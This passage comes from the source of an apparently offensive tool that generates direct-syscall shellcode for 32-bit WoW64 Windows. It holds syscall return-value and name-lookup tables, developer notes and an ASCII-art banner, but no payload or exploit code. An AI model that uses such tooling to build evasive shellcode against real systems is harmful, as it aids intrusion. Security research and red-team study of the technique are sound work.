'STATUS_SUCCESS', 'NtQueryInformationThread': 'STATUS_SUCCESS', 'NtRegisterThreadTerminatePort': 'STATUS_SUCCESS', 'NtResumeThread': 'STATUS_SUCCESS', 'NtSetInformationThread': 'STATUS_SUCCESS', 'NtSuspendThread': 'STATUS_SUCCESS', 'NtTerminateThread': 'STATUS_SUCCESS', 'NtYieldExecution': 'STATUS_SUCCESS', 'RtlCreateUserThread': 'STATUS_SUCCESS', 'NtCancelTimer': 'STATUS_SUCCESS', 'NtCreateTimer': 'STATUS_SUCCESS', 'NtOpenTimer': 'STATUS_SUCCESS', 'NtQueryTimer': 'STATUS_SUCCESS', 'NtSetTimer': 'STATUS_SUCCESS', 'NtAdjustGroupsToken': 'STATUS_SUCCESS', 'NtAdjustPrivilegesToken': 'STATUS_SUCCESS', 'NtCreateToken': 'STATUS_SUCCESS', 'NtDuplicateToken': 'STATUS_SUCCESS', 'NtOpenProcessToken': 'STATUS_SUCCESS', 'NtOpenThreadToken': 'STATUS_SUCCESS', 'NtQueryInformationToken': 'STATUS_SUCCESS', 'NtSetInformationToken': 'STATUS_SUCCESS', 'NtAccessCheckAndAuditAlarm': 'STATUS_SUCCESS', 'NtCloseObjectAuditAlarm': 'STATUS_SUCCESS', 'NtDeleteObjectAuditAlarm': 'STATUS_SUCCESS', 'NtOpenObjectAuditAlarm': 'STATUS_SUCCESS', 'NtPrivilegeObjectAuditAlarm': 'STATUS_SUCCESS', 'NtPrivilegedServiceAuditAlarm': 'STATUS_SUCCESS', 'NtAccessCheck': 'STATUS_SUCCESS', 'NtAllocateLocallyUniqueId': 'STATUS_SUCCESS', 'NtAllocateUuids': 'STATUS_SUCCESS', 'NtPrivilegeCheck': 'STATUS_SUCCESS', 'NtQuerySystemInformation': 'STATUS_SUCCESS', 'NtSetSystemInformation': 'STATUS_SUCCESS', 'NtGetTickCount': 'S_OK', 'NtQueryPerformanceCounter': 'STATUS_SUCCESS', 'NtQuerySystemTime': 'STATUS_SUCCESS', 'NtQueryTimerResolution': 'STATUS_SUCCESS', 'NtSetSystemTime': 'STATUS_SUCCESS', 'NtSetTimerResolution': 'STATUS_SUCCESS', 'RtlTimeFieldsToTime': 'S_OK', 'RtlTimeToTimeFields': 'S_OK', 'NtAllocateVirtualMemory': 'STATUS_SUCCESS', 'NtClose': 'STATUS_SUCCESS', 'NtCreateFile': 'STATUS_SUCCESS', 'NtCreateSection': 'STATUS_SUCCESS', 'NtDeviceIoControlFile': 'STATUS_SUCCESS', 'NtDuplicateToken': 'STATUS_SUCCESS', 'NtFlushBuffersFileEx': 'STATUS_SUCCESS', 'NtFreeVirtualMemory': 'STATUS_SUCCESS', 'NtFsControlFile': 'STATUS_SUCCESS', 'NtLockFile': 'STATUS_SUCCESS', 'NtOpenFile': 'STATUS_SUCCESS', 'NtOpenProcessToken': 'STATUS_SUCCESS', 'NtOpenProcessTokenEx': 'STATUS_SUCCESS', 'NtOpenThreadToken': 'STATUS_SUCCESS', 'NtOpenThreadTokenEx': 'STATUS_SUCCESS', 'NtPrivilegeCheck': 'STATUS_SUCCESS', 'NtQueryDirectoryFile': 'STATUS_SUCCESS', 'NtQueryDirectoryFileEx': 'STATUS_SUCCESS', 'NtQueryInformationFile': 'STATUS_SUCCESS', 'NtQueryInformationToken': 'STATUS_SUCCESS', 'NtQueryObject': 'STATUS_SUCCESS', 'NtQueryQuotaInformationFile': 'STATUS_SUCCESS', 'NtQuerySecurityObject': 'STATUS_SUCCESS', 'NtQueryVirtualMemory': 'STATUS_SUCCESS', 'NtQueryVolumeInformationFile': 'STATUS_SUCCESS', 'NtReadFile': 'STATUS_SUCCESS', 'NtSetInformationFile': 'STATUS_SUCCESS', 'NtSetInformationThread': 'STATUS_SUCCESS', 'NtSetInformationToken': 'STATUS_SUCCESS', 'NtSetQuotaInformationFile': 'STATUS_SUCCESS', 'NtSetSecurityObject': 'STATUS_SUCCESS', 'NtUnlockFile': 'STATUS_SUCCESS', 'NtWriteFile': 'STATUS_SUCCESS'} syscallLowerLookupDict={"ntacceptconnectport":"NtAcceptConnectPort","ntaccesscheck":"NtAccessCheck","ntaccesscheckandauditalarm":"NtAccessCheckAndAuditAlarm","ntaccesscheckbytype":"NtAccessCheckByType","ntaccesscheckbytypeandauditalarm":"NtAccessCheckByTypeAndAuditAlarm","ntaccesscheckbytyperesultlist":"NtAccessCheckByTypeResultList","ntaccesscheckbytyperesultlistandauditalarm":"NtAccessCheckByTypeResultListAndAuditAlarm","ntaccesscheckbytyperesultlistandauditalarmbyhandle":"NtAccessCheckByTypeResultListAndAuditAlarmByHandle","ntacquirecrossvmmutant":"NtAcquireCrossVmMutant","ntacquireprocessactivityreference":"NtAcquireProcessActivityReference","ntaddatom":"NtAddAtom","ntaddatomex":"NtAddAtomEx","ntaddbootentry":"NtAddBootEntry","ntadddriverentry":"NtAddDriverEntry","ntadjustgroupstoken":"NtAdjustGroupsToken","ntadjustprivilegestoken":"NtAdjustPrivilegesToken","ntadjusttokenclaimsanddevicegroups":"NtAdjustTokenClaimsAndDeviceGroups","ntalertresumethread":"NtAlertResumeThread","ntalertthread":"NtAlertThread","ntalertthreadbythreadid":"NtAlertThreadByThreadId","ntallocatelocallyuniqueid":"NtAllocateLocallyUniqueId","ntallocatereserveobject":"NtAllocateReserveObject","ntallocateuserphysicalpages":"NtAllocateUserPhysicalPages","ntallocateuserphysicalpagesex":"NtAllocateUserPhysicalPagesEx","ntallocateuuids":"NtAllocateUuids","ntallocatevirtualmemory":"NtAllocateVirtualMemory","ntallocatevirtualmemoryex":"NtAllocateVirtualMemoryEx","ntalpcacceptconnectport":"NtAlpcAcceptConnectPort","ntalpccancelmessage":"NtAlpcCancelMessage","ntalpcconnectport":"NtAlpcConnectPort","ntalpcconnectportex":"NtAlpcConnectPortEx","ntalpccreateport":"NtAlpcCreatePort","ntalpccreateportsection":"NtAlpcCreatePortSection","ntalpccreateresourcereserve":"NtAlpcCreateResourceReserve","ntalpccreatesectionview":"NtAlpcCreateSectionView","ntalpccreatesecuritycontext":"NtAlpcCreateSecurityContext","ntalpcdeleteportsection":"NtAlpcDeletePortSection","ntalpcdeleteresourcereserve":"NtAlpcDeleteResourceReserve","ntalpcdeletesectionview":"NtAlpcDeleteSectionView","ntalpcdeletesecuritycontext":"NtAlpcDeleteSecurityContext","ntalpcdisconnectport":"NtAlpcDisconnectPort","ntalpcimpersonateclientcontainerofport":"NtAlpcImpersonateClientContainerOfPort","ntalpcimpersonateclientofport":"NtAlpcImpersonateClientOfPort","ntalpcopensenderprocess":"NtAlpcOpenSenderProcess","ntalpcopensenderthread":"NtAlpcOpenSenderThread","ntalpcqueryinformation":"NtAlpcQueryInformation","ntalpcqueryinformationmessage":"NtAlpcQueryInformationMessage","ntalpcrevokesecuritycontext":"NtAlpcRevokeSecurityContext","ntalpcsendwaitreceiveport":"NtAlpcSendWaitReceivePort","ntalpcsetinformation":"NtAlpcSetInformation","ntapphelpcachecontrol":"NtApphelpCacheControl","ntaremappedfilesthesame":"NtAreMappedFilesTheSame","ntassignprocesstojobobject":"NtAssignProcessToJobObject","ntassociatewaitcompletionpacket":"NtAssociateWaitCompletionPacket","ntcallenclave":"NtCallEnclave","ntcallbackreturn":"NtCallbackReturn","ntcanceliofile":"NtCancelIoFile","ntcanceliofileex":"NtCancelIoFileEx","ntcancelsynchronousiofile":"NtCancelSynchronousIoFile","ntcanceltimer":"NtCancelTimer","ntcanceltimer2":"NtCancelTimer2","ntcancelwaitcompletionpacket":"NtCancelWaitCompletionPacket","ntchangeprocessstate":"NtChangeProcessState","ntchangethreadstate":"NtChangeThreadState","ntclearevent":"NtClearEvent","ntclose":"NtClose","ntcloseobjectauditalarm":"NtCloseObjectAuditAlarm","ntcommitcomplete":"NtCommitComplete","ntcommitenlistment":"NtCommitEnlistment","ntcommitregistrytransaction":"NtCommitRegistryTransaction","ntcommittransaction":"NtCommitTransaction","ntcompactkeys":"NtCompactKeys","ntcompareobjects":"NtCompareObjects","ntcomparesigninglevels":"NtCompareSigningLevels","ntcomparetokens":"NtCompareTokens","ntcompleteconnectport":"NtCompleteConnectPort","ntcompresskey":"NtCompressKey","ntconnectport":"NtConnectPort","ntcontinue":"NtContinue","ntcontinueex":"NtContinueEx","ntconvertbetweenauxiliarycounterandperformancecounter":"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter","ntcreatecrossvmevent":"NtCreateCrossVmEvent","ntcreatecrossvmmutant":"NtCreateCrossVmMutant","ntcreatedebugobject":"NtCreateDebugObject","ntcreatedirectoryobject":"NtCreateDirectoryObject","ntcreatedirectoryobjectex":"NtCreateDirectoryObjectEx","ntcreateenclave":"NtCreateEnclave","ntcreateenlistment":"NtCreateEnlistment","ntcreateevent":"NtCreateEvent","ntcreateeventpair":"NtCreateEventPair","ntcreatefile":"NtCreateFile","ntcreateirtimer":"NtCreateIRTimer","ntcreateiocompletion":"NtCreateIoCompletion","ntcreateioring":"NtCreateIoRing","ntcreatejobobject":"NtCreateJobObject","ntcreatejobset":"NtCreateJobSet","ntcreatekey":"NtCreateKey","ntcreatekeytransacted":"NtCreateKeyTransacted","ntcreatekeyedevent":"NtCreateKeyedEvent","ntcreatelowboxtoken":"NtCreateLowBoxToken","ntcreatemailslotfile":"NtCreateMailslotFile","ntcreatemutant":"NtCreateMutant","ntcreatenamedpipefile":"NtCreateNamedPipeFile","ntcreatepagingfile":"NtCreatePagingFile","ntcreatepartition":"NtCreatePartition","ntcreateport":"NtCreatePort","ntcreateprivatenamespace":"NtCreatePrivateNamespace","ntcreateprocess":"NtCreateProcess","ntcreateprocessex":"NtCreateProcessEx","ntcreateprocessstatechange":"NtCreateProcessStateChange","ntcreateprofile":"NtCreateProfile","ntcreateprofileex":"NtCreateProfileEx","ntcreateregistrytransaction":"NtCreateRegistryTransaction","ntcreateresourcemanager":"NtCreateResourceManager","ntcreatesection":"NtCreateSection","ntcreatesectionex":"NtCreateSectionEx","ntcreatesemaphore":"NtCreateSemaphore","ntcreatesymboliclinkobject":"NtCreateSymbolicLinkObject","ntcreatethread":"NtCreateThread","ntcreatethreadex":"NtCreateThreadEx","ntcreatethreadstatechange":"NtCreateThreadStateChange","ntcreatetimer":"NtCreateTimer","ntcreatetimer2":"NtCreateTimer2","ntcreatetoken":"NtCreateToken","ntcreatetokenex":"NtCreateTokenEx","ntcreatetransaction":"NtCreateTransaction","ntcreatetransactionmanager":"NtCreateTransactionManager","ntcreateuserprocess":"NtCreateUserProcess","ntcreatewaitcompletionpacket":"NtCreateWaitCompletionPacket","ntcreatewaitableport":"NtCreateWaitablePort","ntcreatewnfstatename":"NtCreateWnfStateName","ntcreateworkerfactory":"NtCreateWorkerFactory","ntdebugactiveprocess":"NtDebugActiveProcess","ntdebugcontinue":"NtDebugContinue","ntdelayexecution":"NtDelayExecution","ntdeleteatom":"NtDeleteAtom","ntdeletebootentry":"NtDeleteBootEntry","ntdeletedriverentry":"NtDeleteDriverEntry","ntdeletefile":"NtDeleteFile","ntdeletekey":"NtDeleteKey","ntdeleteobjectauditalarm":"NtDeleteObjectAuditAlarm","ntdeleteprivatenamespace":"NtDeletePrivateNamespace","ntdeletevaluekey":"NtDeleteValueKey","ntdeletewnfstatedata":"NtDeleteWnfStateData","ntdeletewnfstatename":"NtDeleteWnfStateName","ntdeviceiocontrolfile":"NtDeviceIoControlFile","ntdirectgraphicscall":"NtDirectGraphicsCall","ntdisablelastknowngood":"NtDisableLastKnownGood","ntdisplaystring":"NtDisplayString","ntdrawtext":"NtDrawText","ntduplicateobject":"NtDuplicateObject","ntduplicatetoken":"NtDuplicateToken","ntenablelastknowngood":"NtEnableLastKnownGood","ntenumeratebootentries":"NtEnumerateBootEntries","ntenumeratedriverentries":"NtEnumerateDriverEntries","ntenumeratekey":"NtEnumerateKey","ntenumeratesystemenvironmentvaluesex":"NtEnumerateSystemEnvironmentValuesEx","ntenumeratetransactionobject":"NtEnumerateTransactionObject","ntenumeratevaluekey":"NtEnumerateValueKey","ntextendsection":"NtExtendSection","ntfilterbootoption":"NtFilterBootOption","ntfiltertoken":"NtFilterToken","ntfiltertokenex":"NtFilterTokenEx","ntfindatom":"NtFindAtom","ntflushbuffersfile":"NtFlushBuffersFile","ntflushbuffersfileex":"NtFlushBuffersFileEx","ntflushinstalluilanguage":"NtFlushInstallUILanguage","ntflushinstructioncache":"NtFlushInstructionCache","ntflushkey":"NtFlushKey","ntflushprocesswritebuffers":"NtFlushProcessWriteBuffers","ntflushvirtualmemory":"NtFlushVirtualMemory","ntflushwritebuffer":"NtFlushWriteBuffer","ntfreeuserphysicalpages":"NtFreeUserPhysicalPages","ntfreevirtualmemory":"NtFreeVirtualMemory","ntfreezeregistry":"NtFreezeRegistry","ntfreezetransactions":"NtFreezeTransactions","ntfscontrolfile":"NtFsControlFile","ntgetcachedsigninglevel":"NtGetCachedSigningLevel","ntgetcompletewnfstatesubscription":"NtGetCompleteWnfStateSubscription","ntgetcontextthread":"NtGetContextThread","ntgetcurrentprocessornumber":"NtGetCurrentProcessorNumber","ntgetcurrentprocessornumberex":"NtGetCurrentProcessorNumberEx","ntgetdevicepowerstate":"NtGetDevicePowerState","ntgetmuiregistryinfo":"NtGetMUIRegistryInfo","ntgetnextprocess":"NtGetNextProcess","ntgetnextthread":"NtGetNextThread","ntgetnlssectionptr":"NtGetNlsSectionPtr","ntgetnotificationresourcemanager":"NtGetNotificationResourceManager","ntgetwritewatch":"NtGetWriteWatch","ntimpersonateanonymoustoken":"NtImpersonateAnonymousToken","ntimpersonateclientofport":"NtImpersonateClientOfPort","ntimpersonatethread":"NtImpersonateThread","ntinitializeenclave":"NtInitializeEnclave","ntinitializenlsfiles":"NtInitializeNlsFiles","ntinitializeregistry":"NtInitializeRegistry","ntinitiatepoweraction":"NtInitiatePowerAction","ntisprocessinjob":"NtIsProcessInJob","ntissystemresumeautomatic":"NtIsSystemResumeAutomatic","ntisuilanguagecomitted":"NtIsUILanguageComitted","ntlistenport":"NtListenPort","ntloaddriver":"NtLoadDriver","ntloadenclavedata":"NtLoadEnclaveData","ntloadkey":"NtLoadKey","ntloadkey2":"NtLoadKey2","ntloadkey3":"NtLoadKey3","ntloadkeyex":"NtLoadKeyEx","ntlockfile":"NtLockFile","ntlockproductactivationkeys":"NtLockProductActivationKeys","ntlockregistrykey":"NtLockRegistryKey","ntlockvirtualmemory":"NtLockVirtualMemory","ntmakepermanentobject":"NtMakePermanentObject","ntmaketemporaryobject":"NtMakeTemporaryObject","ntmanagehotpatch":"NtManageHotPatch","ntmanagepartition":"NtManagePartition","ntmapcmfmodule":"NtMapCMFModule","ntmapuserphysicalpages":"NtMapUserPhysicalPages","ntmapuserphysicalpagesscatter":"NtMapUserPhysicalPagesScatter","ntmapviewofsection":"NtMapViewOfSection","ntmapviewofsectionex":"NtMapViewOfSectionEx","ntmodifybootentry":"NtModifyBootEntry","ntmodifydriverentry":"NtModifyDriverEntry","ntnotifychangedirectoryfile":"NtNotifyChangeDirectoryFile","ntnotifychangedirectoryfileex":"NtNotifyChangeDirectoryFileEx","ntnotifychangekey":"NtNotifyChangeKey","ntnotifychangemultiplekeys":"NtNotifyChangeMultipleKeys","ntnotifychangesession":"NtNotifyChangeSession","ntopendirectoryobject":"NtOpenDirectoryObject","ntopenenlistment":"NtOpenEnlistment","ntopenevent":"NtOpenEvent","ntopeneventpair":"NtOpenEventPair","ntopenfile":"NtOpenFile","ntopeniocompletion":"NtOpenIoCompletion","ntopenjobobject":"NtOpenJobObject","ntopenkey":"NtOpenKey","ntopenkeyex":"NtOpenKeyEx","ntopenkeytransacted":"NtOpenKeyTransacted","ntopenkeytransactedex":"NtOpenKeyTransactedEx","ntopenkeyedevent":"NtOpenKeyedEvent","ntopenmutant":"NtOpenMutant","ntopenobjectauditalarm":"NtOpenObjectAuditAlarm","ntopenpartition":"NtOpenPartition","ntopenprivatenamespace":"NtOpenPrivateNamespace","ntopenprocess":"NtOpenProcess","ntopenprocesstoken":"NtOpenProcessToken","ntopenprocesstokenex":"NtOpenProcessTokenEx","ntopenregistrytransaction":"NtOpenRegistryTransaction","ntopenresourcemanager":"NtOpenResourceManager","ntopensection":"NtOpenSection","ntopensemaphore":"NtOpenSemaphore","ntopensession":"NtOpenSession","ntopensymboliclinkobject":"NtOpenSymbolicLinkObject","ntopenthread":"NtOpenThread","ntopenthreadtoken":"NtOpenThreadToken","ntopenthreadtokenex":"NtOpenThreadTokenEx","ntopentimer":"NtOpenTimer","ntopentransaction":"NtOpenTransaction","ntopentransactionmanager":"NtOpenTransactionManager","ntplugplaycontrol":"NtPlugPlayControl","ntpowerinformation":"NtPowerInformation","ntprepreparecomplete":"NtPrePrepareComplete","ntpreprepareenlistment":"NtPrePrepareEnlistment","ntpreparecomplete":"NtPrepareComplete","ntprepareenlistment":"NtPrepareEnlistment","ntprivilegecheck":"NtPrivilegeCheck","ntprivilegeobjectauditalarm":"NtPrivilegeObjectAuditAlarm","ntprivilegedserviceauditalarm":"NtPrivilegedServiceAuditAlarm","ntpropagationcomplete":"NtPropagationComplete","ntpropagationfailed":"NtPropagationFailed","ntprotectvirtualmemory":"NtProtectVirtualMemory","ntpsscapturevaspacebulk":"NtPssCaptureVaSpaceBulk","ntpulseevent":"NtPulseEvent","ntqueryattributesfile":"NtQueryAttributesFile","ntqueryauxiliarycounterfrequency":"NtQueryAuxiliaryCounterFrequency","ntquerybootentryorder":"NtQueryBootEntryOrder","ntquerybootoptions":"NtQueryBootOptions","ntquerydebugfilterstate":"NtQueryDebugFilterState","ntquerydefaultlocale":"NtQueryDefaultLocale","ntquerydefaultuilanguage":"NtQueryDefaultUILanguage","ntquerydirectoryfile":"NtQueryDirectoryFile","ntquerydirectoryfileex":"NtQueryDirectoryFileEx","ntquerydirectoryobject":"NtQueryDirectoryObject","ntquerydriverentryorder":"NtQueryDriverEntryOrder","ntqueryeafile":"NtQueryEaFile","ntqueryevent":"NtQueryEvent","ntqueryfullattributesfile":"NtQueryFullAttributesFile","ntqueryinformationatom":"NtQueryInformationAtom","ntqueryinformationbyname":"NtQueryInformationByName","ntqueryinformationenlistment":"NtQueryInformationEnlistment","ntqueryinformationfile":"NtQueryInformationFile","ntqueryinformationjobobject":"NtQueryInformationJobObject","ntqueryinformationport":"NtQueryInformationPort","ntqueryinformationprocess":"NtQueryInformationProcess","ntqueryinformationresourcemanager":"NtQueryInformationResourceManager","ntqueryinformationthread":"NtQueryInformationThread","ntqueryinformationtoken":"NtQueryInformationToken","ntqueryinformationtransaction":"NtQueryInformationTransaction","ntqueryinformationtransactionmanager":"NtQueryInformationTransactionManager","ntqueryinformationworkerfactory":"NtQueryInformationWorkerFactory","ntqueryinstalluilanguage":"NtQueryInstallUILanguage","ntqueryintervalprofile":"NtQueryIntervalProfile","ntqueryiocompletion":"NtQueryIoCompletion","ntqueryioringcapabilities":"NtQueryIoRingCapabilities","ntquerykey":"NtQueryKey","ntquerylicensevalue":"NtQueryLicenseValue","ntquerymultiplevaluekey":"NtQueryMultipleValueKey","ntquerymutant":"NtQueryMutant","ntqueryobject":"NtQueryObject","ntqueryopensubkeys":"NtQueryOpenSubKeys","ntqueryopensubkeysex":"NtQueryOpenSubKeysEx","ntqueryperformancecounter":"NtQueryPerformanceCounter","ntqueryportinformationprocess":"NtQueryPortInformationProcess","ntqueryquotainformationfile":"NtQueryQuotaInformationFile","ntquerysection":"NtQuerySection","ntquerysecurityattributestoken":"NtQuerySecurityAttributesToken","ntquerysecurityobject":"NtQuerySecurityObject","ntquerysecuritypolicy":"NtQuerySecurityPolicy","ntquerysemaphore":"NtQuerySemaphore","ntquerysymboliclinkobject":"NtQuerySymbolicLinkObject","ntquerysystemenvironmentvalue":"NtQuerySystemEnvironmentValue","ntquerysystemenvironmentvalueex":"NtQuerySystemEnvironmentValueEx","ntquerysysteminformation":"NtQuerySystemInformation","ntquerysysteminformationex":"NtQuerySystemInformationEx","ntquerytimer":"NtQueryTimer","ntquerytimerresolution":"NtQueryTimerResolution","ntqueryvaluekey":"NtQueryValueKey","ntqueryvirtualmemory":"NtQueryVirtualMemory","ntqueryvolumeinformationfile":"NtQueryVolumeInformationFile","ntquerywnfstatedata":"NtQueryWnfStateData","ntquerywnfstatenameinformation":"NtQueryWnfStateNameInformation","ntqueueapcthread":"NtQueueApcThread","ntqueueapcthreadex":"NtQueueApcThreadEx","ntqueueapcthreadex2":"NtQueueApcThreadEx2","ntraiseexception":"NtRaiseException","ntraiseharderror":"NtRaiseHardError","ntreadfile":"NtReadFile","ntreadfilescatter":"NtReadFileScatter","ntreadonlyenlistment":"NtReadOnlyEnlistment","ntreadrequestdata":"NtReadRequestData","ntreadvirtualmemory":"NtReadVirtualMemory","ntreadvirtualmemoryex":"NtReadVirtualMemoryEx","ntrecoverenlistment":"NtRecoverEnlistment","ntrecoverresourcemanager":"NtRecoverResourceManager","ntrecovertransactionmanager":"NtRecoverTransactionManager","ntregisterprotocoladdressinformation":"NtRegisterProtocolAddressInformation","ntregisterthreadterminateport":"NtRegisterThreadTerminatePort","ntreleasekeyedevent":"NtReleaseKeyedEvent","ntreleasemutant":"NtReleaseMutant","ntreleasesemaphore":"NtReleaseSemaphore","ntreleaseworkerfactoryworker":"NtReleaseWorkerFactoryWorker","ntremoveiocompletion":"NtRemoveIoCompletion","ntremoveiocompletionex":"NtRemoveIoCompletionEx","ntremoveprocessdebug":"NtRemoveProcessDebug","ntrenamekey":"NtRenameKey","ntrenametransactionmanager":"NtRenameTransactionManager","ntreplacekey":"NtReplaceKey","ntreplacepartitionunit":"NtReplacePartitionUnit","ntreplyport":"NtReplyPort","ntreplywaitreceiveport":"NtReplyWaitReceivePort","ntreplywaitreceiveportex":"NtReplyWaitReceivePortEx","ntreplywaitreplyport":"NtReplyWaitReplyPort","ntrequestport":"NtRequestPort","ntrequestwaitreplyport":"NtRequestWaitReplyPort","ntresetevent":"NtResetEvent","ntresetwritewatch":"NtResetWriteWatch","ntrestorekey":"NtRestoreKey","ntresumeprocess":"NtResumeProcess","ntresumethread":"NtResumeThread","ntrevertcontainerimpersonation":"NtRevertContainerImpersonation","ntrollbackcomplete":"NtRollbackComplete","ntrollbackenlistment":"NtRollbackEnlistment","ntrollbackregistrytransaction":"NtRollbackRegistryTransaction","ntrollbacktransaction":"NtRollbackTransaction","ntrollforwardtransactionmanager":"NtRollforwardTransactionManager","ntsavekey":"NtSaveKey","ntsavekeyex":"NtSaveKeyEx","ntsavemergedkeys":"NtSaveMergedKeys","ntsecureconnectport":"NtSecureConnectPort","ntserializeboot":"NtSerializeBoot","ntsetbootentryorder":"NtSetBootEntryOrder","ntsetbootoptions":"NtSetBootOptions","ntsetcachedsigninglevel":"NtSetCachedSigningLevel","ntsetcachedsigninglevel2":"NtSetCachedSigningLevel2","ntsetcontextthread":"NtSetContextThread","ntsetdebugfilterstate":"NtSetDebugFilterState","ntsetdefaultharderrorport":"NtSetDefaultHardErrorPort","ntsetdefaultlocale":"NtSetDefaultLocale","ntsetdefaultuilanguage":"NtSetDefaultUILanguage","ntsetdriverentryorder":"NtSetDriverEntryOrder","ntseteafile":"NtSetEaFile","ntsetevent":"NtSetEvent","ntseteventboostpriority":"NtSetEventBoostPriority","ntsethigheventpair":"NtSetHighEventPair","ntsethighwaitloweventpair":"NtSetHighWaitLowEventPair","ntsetirtimer":"NtSetIRTimer","ntsetinformationdebugobject":"NtSetInformationDebugObject","ntsetinformationenlistment":"NtSetInformationEnlistment","ntsetinformationfile":"NtSetInformationFile","ntsetinformationioring":"NtSetInformationIoRing","ntsetinformationjobobject":"NtSetInformationJobObject","ntsetinformationkey":"NtSetInformationKey","ntsetinformationobject":"NtSetInformationObject","ntsetinformationprocess":"NtSetInformationProcess","ntsetinformationresourcemanager":"NtSetInformationResourceManager","ntsetinformationsymboliclink":"NtSetInformationSymbolicLink","ntsetinformationthread":"NtSetInformationThread","ntsetinformationtoken":"NtSetInformationToken","ntsetinformationtransaction":"NtSetInformationTransaction","ntsetinformationtransactionmanager":"NtSetInformationTransactionManager","ntsetinformationvirtualmemory":"NtSetInformationVirtualMemory","ntsetinformationworkerfactory":"NtSetInformationWorkerFactory","ntsetintervalprofile":"NtSetIntervalProfile","ntsetiocompletion":"NtSetIoCompletion","ntsetiocompletionex":"NtSetIoCompletionEx","ntsetldtentries":"NtSetLdtEntries","ntsetloweventpair":"NtSetLowEventPair","ntsetlowwaithigheventpair":"NtSetLowWaitHighEventPair","ntsetquotainformationfile":"NtSetQuotaInformationFile","ntsetsecurityobject":"NtSetSecurityObject","ntsetsystemenvironmentvalue":"NtSetSystemEnvironmentValue","ntsetsystemenvironmentvalueex":"NtSetSystemEnvironmentValueEx","ntsetsysteminformation":"NtSetSystemInformation","ntsetsystempowerstate":"NtSetSystemPowerState","ntsetsystemtime":"NtSetSystemTime","ntsetthreadexecutionstate":"NtSetThreadExecutionState","ntsettimer":"NtSetTimer","ntsettimer2":"NtSetTimer2","ntsettimerex":"NtSetTimerEx","ntsettimerresolution":"NtSetTimerResolution","ntsetuuidseed":"NtSetUuidSeed","ntsetvaluekey":"NtSetValueKey","ntsetvolumeinformationfile":"NtSetVolumeInformationFile","ntsetwnfprocessnotificationevent":"NtSetWnfProcessNotificationEvent","ntshutdownsystem":"NtShutdownSystem","ntshutdownworkerfactory":"NtShutdownWorkerFactory","ntsignalandwaitforsingleobject":"NtSignalAndWaitForSingleObject","ntsinglephasereject":"NtSinglePhaseReject","ntstartprofile":"NtStartProfile","ntstopprofile":"NtStopProfile","ntsubmitioring":"NtSubmitIoRing","ntsubscribewnfstatechange":"NtSubscribeWnfStateChange","ntsuspendprocess":"NtSuspendProcess","ntsuspendthread":"NtSuspendThread","ntsystemdebugcontrol":"NtSystemDebugControl","ntterminateenclave":"NtTerminateEnclave","ntterminatejobobject":"NtTerminateJobObject","ntterminateprocess":"NtTerminateProcess","ntterminatethread":"NtTerminateThread","nttestalert":"NtTestAlert","ntthawregistry":"NtThawRegistry","ntthawtransactions":"NtThawTransactions","nttracecontrol":"NtTraceControl","nttraceevent":"NtTraceEvent","nttranslatefilepath":"NtTranslateFilePath","ntumsthreadyield":"NtUmsThreadYield","ntunloaddriver":"NtUnloadDriver","ntunloadkey":"NtUnloadKey","ntunloadkey2":"NtUnloadKey2","ntunloadkeyex":"NtUnloadKeyEx","ntunlockfile":"NtUnlockFile","ntunlockvirtualmemory":"NtUnlockVirtualMemory","ntunmapviewofsection":"NtUnmapViewOfSection","ntunmapviewofsectionex":"NtUnmapViewOfSectionEx","ntunsubscribewnfstatechange":"NtUnsubscribeWnfStateChange","ntupdatewnfstatedata":"NtUpdateWnfStateData","ntvdmcontrol":"NtVdmControl","ntwaitforalertbythreadid":"NtWaitForAlertByThreadId","ntwaitfordebugevent":"NtWaitForDebugEvent","ntwaitforkeyedevent":"NtWaitForKeyedEvent","ntwaitformultipleobjects":"NtWaitForMultipleObjects","ntwaitformultipleobjects32":"NtWaitForMultipleObjects32","ntwaitforsingleobject":"NtWaitForSingleObject","ntwaitforworkviaworkerfactory":"NtWaitForWorkViaWorkerFactory","ntwaithigheventpair":"NtWaitHighEventPair","ntwaitloweventpair":"NtWaitLowEventPair","ntworkerfactoryworkerready":"NtWorkerFactoryWorkerReady","ntwritefile":"NtWriteFile","ntwritefilegather":"NtWriteFileGather","ntwriterequestdata":"NtWriteRequestData","ntwritevirtualmemory":"NtWriteVirtualMemory","ntyieldexecution":"NtYieldExecution","rtlgetnativesysteminformation":"RtlGetNativeSystemInformation"} # Notes: # Everything seems to be STATUS_SUCCESS, NTSTATUS # Do we need to put all of return values in an output variable instead of eax # If so, how do we automagically determine which variable is to be used for output ================================================ FILE: start/ui.py ================================================ import colorama colorama.init() red ='\u001b[31;1m' gre = '\u001b[32;1m' yel = '\u001b[33;1m' blu = '\u001b[34;1m' mag = '\u001b[35;1m' cya = '\u001b[36;1m' whi = '\u001b[37m' res = '\u001b[0m' res2 = '\u001b[0m' def showOptions(): pass def splash(): splash=yel+""" " , , ", , "" _---. ..;%%%;, . "" .", , .==% %%%%%%% ' . "", %%% =%% %%%%%%; ; ;-_ %; %%%%% .;%;%%%"%p ---; _ '-_ %; %%%%% __;%%;p/; O --_ "-,_ q; %%% /v \;%p ;%%%%%;--__ "'-__'-.__ //\\" // \ % ;%%%%%%%;',/%\_ __ "'-_'\__ \ / // \/ ;%% %; %;/\%%%%;;;;\ "- _\ ," %; %%; %%;;' ';% -\-__ -=\=" __% %%;_ |;; %%%\ \ _/ _= \==_;;,_ %%%; % -_ / / /- =%- ;%%%%; %%; "--__/ //= ==%-%%; %; % / _=_- d ;%; ;%; :F_P: \ =,-" d%%; ;%%; // % ;%%; // d%%%" \ %% v """+res splash2=cya+""" _____ _ _ ___ __ / ____| | | | \ \ / / | (___ | |__ ___| | |\ \ /\ / /_ _ ___ _ __ \___ \| '_ \ / _ \ | | \ \/ \/ / _` / __| '_ \ ____) | | | | __/ | | \ /\ / (_| \__ \ |_) | |_____/|_| |_|\___|_|_| \/ \/ \__,_|___/ .__/ | | Syscall Shellcode for WoW64, 32-bit |_| """+res author=yel+" v.2.0: Bramwell Brizendine, 2022-2023"+res print (splash) print (splash2) print (author) oldSlash2=cya+""" _____ _____ _ _ _ _ / ___| / ___| | | | | | | \ `--. _ _ ___ \ `--.| |__ ___| | | ___ ___ __| | ___ `--. \ | | / __| `--. \ '_ \ / _ \ | |/ __/ _ \ / _` |/ _ \ /\__/ / |_| \__ \/\__/ / | | | __/ | | (_| (_) | (_| | __/ \____/ \__, |___/\____/|_| |_|\___|_|_|\___\___/ \__,_|\___| __/ | |___/ Syscall Shellcode for WoW64, 32-bit """